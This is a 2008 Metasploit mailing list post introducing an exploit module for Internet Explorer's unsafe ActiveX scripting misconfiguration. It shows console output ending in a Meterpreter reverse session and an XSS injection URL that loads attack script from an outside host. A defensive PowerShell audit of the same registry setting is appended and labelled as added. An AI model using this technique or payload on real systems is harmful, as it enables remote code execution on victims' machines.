Metasploit mailing list archives

ie_unsafe_scripting.rb exploit module


From: natron at invisibledenizen.org (natron)
Date: Tue, 16 Dec 2008 10:35:39 -0600

All,

I've recently come across environments that have the "Initialize and
script ActiveX controls not marked safe for scripting" configured to
run without prompt for the 'Intranet' or 'Trusted Sites' zones.  This
grants access to WScript.Shell, so my first thought was to add a
little code to ie_createobject, but I discovered that the unsafe
scripting setting doesn't grant access to the MSXML.XMLHTTP, so a
warning dialog still popped.

So, I used Scripting.FileSystemObject to dump commands to a .vbs file,
which then calls MSXML2.XMLHTTP to download the payload.  When
complete, the javascript executes the downloaded file.

msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 127.0.0.1
[*] Started reverse handler
[*] Using URL: http://127.0.0.1:8080/ie_unsafe_scripting.js
[*] Server started.
[*] Sending exploit javascript to 127.0.0.1:1422...
[*] Exe will be hOIJa.exe and must be manually removed from the %TEMP%
directory on the target.
[*] Sending EXE payload to 127.0.0.1:1424...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (75776 bytes)
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:1425)
msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...

getuid
Server username: DOMAIN\USERNAME


Description from the file:

  'Name'        => 'Internet Explorer Unsafe Scripting Misconfiguration Vulnerability',
  'Description' => %q{
    This exploit takes advantage of the "Initialize and script ActiveX
    controls not marked safe for scripting" setting within Internet Explorer.
    When this option is set, IE allows access to the WScript.Shell ActiveX
    control, which allows javascript to interact with the file system and
    run commands.  This security flaw is not uncommon in corporate
    environments for the 'Intranet' or 'Trusted Site' zones.  This option
    does not allow javascript to save binary data to the file system
    without a security alert, however, so this module downloads a binary
    executable through a .vbs script written to disk and executes.

    When set via domain policy, the most common registry entry to modify
    is HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet
    Settings\Zones\1\1201, which if set to '0' forces ActiveX controls not
    marked safe for scripting to be enabled for the Intranet zone.

    This module creates javascript code meant to be included in a
    <SCRIPT> tag, such as
    http://intranet-server/xss.asp?id=";><script%20src=http://10.10.10.10/ie_unsafe_script.js></script>.
  },
-------------- next part --------------
A non-text attachment was scrubbed...
Name: ie_unsafe_scripting.rb
Type: application/octet-stream
Size: 5317 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081216/0d612dbe/attachment.obj>
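A defender-side check for the misconfiguration the post describes, added here as an example (it is not the poster's code and not part of the module): a PowerShell function that reads the 1201 value for each IE zone from the policy, user and machine hives and flags any zone where it is 0. The zone numbers, the 1201 value name and its meanings (0 = Enable, 1 = Prompt, 3 = Disable) are the standard Internet Settings layout; the function name is an assumption.

```powershell
# Added example (not from the original post or the module): audit the IE
# "Initialize and script ActiveX controls not marked safe for scripting"
# setting, stored as DWORD value 1201 under each zone key, and flag zones
# where it is 0 (enable without prompt). Other values: 1 = Prompt, 3 = Disable.
function Get-IEUnsafeScriptingSetting {
    $zoneNames = @{ 0 = 'Local Machine'; 1 = 'Intranet'; 2 = 'Trusted Sites'
                    3 = 'Internet';      4 = 'Restricted Sites' }
    $states    = @{ 0 = 'Enable (no prompt)'; 1 = 'Prompt'; 3 = 'Disable' }

    # Policy keys (set by GPO) generally take precedence over the user and
    # machine keys, so all four locations are inspected and reported.
    $roots = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKCU:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
    )

    foreach ($root in $roots) {
        foreach ($zone in 0..4) {
            $key = Join-Path $root $zone
            if (-not (Test-Path $key)) { continue }
            $item = Get-ItemProperty -Path $key -Name '1201' -ErrorAction SilentlyContinue
            if ($null -eq $item) { continue }          # 1201 not set in this hive
            $value = [int]$item.'1201'
            $state = if ($states.ContainsKey($value)) { $states[$value] } else { "unknown ($value)" }
            [pscustomobject]@{
                Hive   = $root.Split(':')[0]
                Policy = ($root -like '*\Policies\*')
                Zone   = "$zone ($($zoneNames[$zone]))"
                Value  = $value
                State  = $state
                Weak   = ($value -eq 0)
            }
        }
    }
}

# Report only the weak entries; drop the Where-Object to see every zone.
Get-IEUnsafeScriptingSetting | Where-Object Weak | Format-Table -AutoSize
```

A policy-hive row with Weak = True for zone 1 or 2 is the condition the post relies on; when no rows print, 1201 is either unset or set to Prompt/Disable everywhere.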

